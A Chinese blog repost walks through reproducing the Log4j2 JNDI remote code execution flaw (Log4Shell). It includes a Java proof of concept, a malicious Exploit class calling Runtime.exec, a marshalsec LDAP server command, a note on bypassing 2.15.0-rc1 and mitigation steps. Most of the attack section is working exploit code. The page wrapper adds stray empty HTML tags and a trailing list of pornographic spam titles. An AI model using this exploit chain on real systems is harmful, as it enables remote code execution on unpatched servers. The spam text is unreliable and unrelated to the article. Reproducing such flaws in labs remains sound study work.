1. <strong id="7actg"></strong>
    2. <table id="7actg"></table>

    3. <address id="7actg"></address>
      <address id="7actg"></address>
      1. <object id="7actg"><tt id="7actg"></tt></object>

        千萬別中招!手把手教你復(fù)現(xiàn)Log4j2漏洞!

        共 320字,需瀏覽 1分鐘

         ·

        2021-12-18 15:45

        來源:https://blog.csdn.net/qq_40989258/article/details/121862363

        |?簡介

        ApacheLog4j2是一個開源的Java日志框架,被廣泛地應(yīng)用在中間件、開發(fā)框架與Web應(yīng)用中。

        | 漏洞概述

        該漏洞是由于Apache Log4j2某些功能存在遞歸解析功能,未經(jīng)身份驗證的攻擊者通過發(fā)送特定惡意數(shù)據(jù)包,可在目標(biāo)服務(wù)器上執(zhí)行任意代碼。

        | 影響范圍

        Apache Log4j 2.x <= 2.15.0-rc1

        | 環(huán)境搭建

        創(chuàng)建一個新的maven項目,并導(dǎo)入Log4j的依賴包
        <dependency>
        ????<groupId>org.apache.logging.log4jgroupId>
        ????<artifactId>log4j-coreartifactId>
        ????<version>2.14.1version>
        dependency>

        | 漏洞利用

        1 使用POC測試

        import?org.apache.logging.log4j.LogManager;
        import?org.apache.logging.log4j.Logger;
        class?LogTest?{
        ????public?static?final?Logger?logger?=?LogManager.getLogger();
        ????public?static?void?main(String[]?args)?{
        ????????logger.error("${jndi:ldap://localhost:8888/Exploit}");
        ????}
        }
        2 編譯一惡意類Exploit.class

        首先新建exp.java,然后編譯為class文件。

        class?Exploit?{
        ????static?{
        ????????System.err.println("Pwned");
        ????????try?{
        ????????????String?cmds?=?"calc";
        ????????????Runtime.getRuntime().exec(cmds);
        ????????}?catch?(?Exception?e?)?{
        ????????????e.printStackTrace();
        ????????}
        ????}
        }

        javac exp.java

        3 使用marshalsec-0.0.3-SNAPSHOT-all.jar本地開啟一個LDAP服務(wù)
        java?-cp?marshalsec-0.0.3-SNAPSHOT-all.jar?marshalsec.jndi.LDAPRefServer
        "http://127.0.0.1:7777/#Exploit"?8888

        4 運行poc.java,即可訪問惡意類并執(zhí)行寫在其中的"calc"命令

        結(jié)合一些其它 StrLookup 適當(dāng)變形,以及配合官方測試用例中臟數(shù)據(jù)"?Type=A Type&Name=1100110&Char=!"可繞過rc1,RC2版本對此異常進(jìn)行了捕獲。

        https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2

        | 修復(fù)方式

        目前,Apache官方已發(fā)布新版本完成漏洞修復(fù),建議用戶盡快進(jìn)行自查,并及時升級至最新版本:

        https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

        建議同時采用如下臨時措施進(jìn)行漏洞防范:
        • 添加jvm啟動參數(shù)-Dlog4j2.formatMsgNoLookups=true;
        • 在應(yīng)用classpath下添加log4j2.component.properties配置文件,文件內(nèi)容為log4j2.formatMsgNoLookups=true;
        • JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;
        • 部署使用第三方防火墻產(chǎn)品進(jìn)行安全防護(hù)。



        END


        推薦閱讀

        一鍵生成Springboot & Vue項目!【畢設(shè)神器】

        Java可視化編程工具系列(一)

        Java可視化編程工具系列(二)


        順便給大家推薦一個GitHub項目,這個 GitHub 整理了上千本常用技術(shù)PDF,絕大部分核心的技術(shù)書籍都可以在這里找到,

        GitHub地址:https://github.com/javadevbooks/books

        Gitee地址:https://gitee.com/javadevbooks/books

        電子書已經(jīng)更新好了,你們需要的可以自行下載了,記得點一個star,持續(xù)更新中..


        瀏覽 45
        點贊
        評論
        收藏
        分享

        手機掃一掃分享

        分享
        舉報
        評論
        圖片
        表情
        推薦
        點贊
        評論
        收藏
        分享

        手機掃一掃分享

        分享
        舉報
        1. <strong id="7actg"></strong>
        2. <table id="7actg"></table>

        3. <address id="7actg"></address>
          <address id="7actg"></address>
          1. <object id="7actg"><tt id="7actg"></tt></object>
            亚洲黄色在线免费观看 | 日韩欧美一卡二卡三卡四卡无卡 | 欧美性爱福利视频 | 亚洲综合成人视频 | 波多野结衣黄色视频 | 中国男女全黄大片 | 成人理伦A级A片在线论坛 | 亚洲免费黄色片 | 久久久福利电影 | 国产毛片一伦一性一色 |